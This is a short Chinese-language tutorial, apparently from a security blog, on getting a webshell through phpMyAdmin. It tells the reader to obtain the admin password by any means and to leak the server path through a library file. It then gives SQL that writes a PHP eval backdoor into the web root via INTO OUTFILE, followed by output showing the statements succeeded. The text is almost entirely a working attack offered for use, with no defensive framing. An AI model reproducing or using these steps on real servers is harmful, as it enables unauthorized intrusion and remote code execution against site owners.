教你phpMyAdmin 后台拿webshell

  • A+
所属分类:网络安全

1.如何拿到登陆密码,自己想办法。

2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

3.选择一个Database.运行以下语句.

----start code---

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');

select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';

Drop TABLE IF EXISTS a;

----end code---

4.如果没什么意外.对应网站得到webshell

您运行的 SQL 语句已经成功运行了。

SQL 查询:

CREATE TABLE a(

cmd text NOT NULL

);# MySQL 返回的查询结果为空(即零行)。

INSERT INTO a( cmd )

VALUES (

'<?php eval($_POST[1]);?>'

);# 影响列数: 1

SELECT cmd

FROM a

INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1

DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。